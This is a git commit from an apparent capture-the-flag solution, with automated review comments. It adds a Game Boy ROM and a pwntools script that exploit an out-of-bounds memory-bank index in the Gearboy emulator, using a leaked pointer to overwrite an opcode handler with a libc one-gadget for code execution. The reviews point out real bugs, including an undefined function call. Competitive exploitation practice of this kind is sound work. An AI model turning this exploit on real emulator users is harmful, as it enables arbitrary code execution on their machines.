commit 818a0be94c63c6ddfabe108ca49e2c26922fc130
Author: Louis Burda <quent.burda@gmail.com>
Date: Thu, 26 May 2022 02:57:04 +0200
Attempt via memory object
Diffstat:
A | .gitignore | | | 2 | ++ |
A | Makefile | | | 28 | ++++++++++++++++++++++++++++ |
A | main.c | | | 31 | +++++++++++++++++++++++++++++++ |
A | solve.py | | | 42 | ++++++++++++++++++++++++++++++++++++++++++ |
4 files changed, 103 insertions(+), 0 deletions(-)
diff --git a/.gitignore b/.gitignore
@@ -0,0 +1,2 @@
+main.gb
+main.state
diff --git a/Makefile b/Makefile
@@ -0,0 +1,28 @@
+LCC = ./gbdk/build/gbdk/bin/lcc
+SDCC = ./sdcc/bin/sdcc
+GEARBOY = ./gearboy/platforms/linux/gearboy
+
+.PHONY: all clean run
+
+all: main.gb
+
+clean:
+ rm -f main.gb
+
+$(SDCC):
+ @if [ ! -e Makefile ]; then \
+ cd sdcc && ./configure; \
+ fi
+ make -C sdcc
+
+$(LCC): $(SDCC)
+ SDCCDIR=$(PWD)/sdcc make -C gbdk
+
+main.gb: main.c $(LCC)
+ $(LCC) -o $@ -Wall $< -Wl-yp0x143=0x80
+
+$(GEARBOY):
+ make -C ./gearboy/platforms/linux
+
+run: $(GEARBOY) main.gb
+ $(GEARBOY) main.gb
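Review bot: The `[ ! -e Makefile ]` test in the `$(SDCC)` recipe runs from the top-level directory, where this Makefile always exists, so the `cd sdcc && ./configure` branch is dead and an unconfigured sdcc checkout will fail at `make -C sdcc`. The check should look at the file the configure step actually produces: `@if [ ! -e sdcc/Makefile ]; then \`. Consider also adding `main.state` to `clean` alongside `main.gb`, since both are build products per `.gitignore`; whether `main.state` is regenerated or hand-saved is not visible here.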
diff --git a/main.c b/main.c
@@ -0,0 +1,31 @@
+#include "stdint.h"
+
+void
+main(void)
+{
+ volatile static void *memory;
+ volatile static void *processor;
+ volatile static uint64_t op0x00;
+ volatile static uint64_t libc;
+ volatile static uint64_t onegadget;
+ volatile static uint64_t ld_leak;
+
+ /* memory - wrambanks = 0x72840 */
+
+ /* WRAM BANK = -73 */
+ memory = (void*) 0xD7c0;
+
+ /* get leak from heap */
+ ld_leak = *(uint64_t*)(memory + 0x30);
+ libc = ld_leak + 0x127dff0;
+ onegadget = libc + 0xe3afe;
+
+ /* WRAM BANK -13 */
+ *(uint8_t*)(memory + 0x7c) = 0xf3; /* LSB */
+
+ //* ..with new bank, overwrite op 0x00 funcptr */
+ processor = (void*) 0xD960;
+ *(uint64_t*)(processor) = onegadget;
+
+ while (1);
+}
diff --git a/solve.py b/solve.py
@@ -0,0 +1,42 @@
+#!/usr/bin/env python3
+
+from base64 import b64encode
+from sys import argv,exit
+from pwn import *
+
+context.log_level = "error"
+
+def send(rom, state):
+ #io = process("ncat --ssl 8c83260abb62e95abcc3fdf7-gearboy.challenge.master.cscg.live 31337".split())
+ io = process("ncat localhost 1024".split())
+ io.sendline(b64encode(open(rom, "rb").read()))
+ io.sendline(b64encode(open(state, "rb").read()))
+ data = io.readuntil(b"Got EOF")
+ io.close()
+ return data
+
+def set_wrambanks(filename, index):
+ data = open(filename, "rb").read()
+ data = data[:0x1000] + struct.pack("<i", index) + data[0x1004:]
+ with open(filename, "wb+") as f:
+ f.write(data)
+
+def find_heap_start():
+ search_space = (-256, -90)
+ while search_space[0] + 1 != search_space[1]:
+ testval = (search_space[1] + search_space[0]) // 2
+ print(search_space)
+
+ set_modstate(testval)
+
+ data = send("main.gb", "main.state")
+ if b"exit code 139" in data:
+ search_space = (testval, search_space[1])
+ else:
+ search_space = (search_space[0], testval)
+
+ print("OFFSET", testval)
+
+set_wrambanks("main.gb", -0x37)
+
+print(send("main.gb", "main.state").decode())
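Review bot: `find_heap_start` calls `set_modstate(testval)` on line 109, but no such function is defined or imported in this file, so the bisection raises `NameError` on its first iteration; it presumably means `set_wrambanks("main.gb", testval)`, which is the helper defined just above. The function is currently never called, so the bug is latent, but it is the only way the `OFFSET` search documented by the `print` can be reproduced. `struct.pack` in `set_wrambanks` depends on `struct` being re-exported by `from pwn import *`; an explicit `import struct` would not hurt. `send` also reads both files with `open(...).read()` without closing them; `with open(rom, "rb") as f:` keeps the handles bounded across the many iterations the bisection makes.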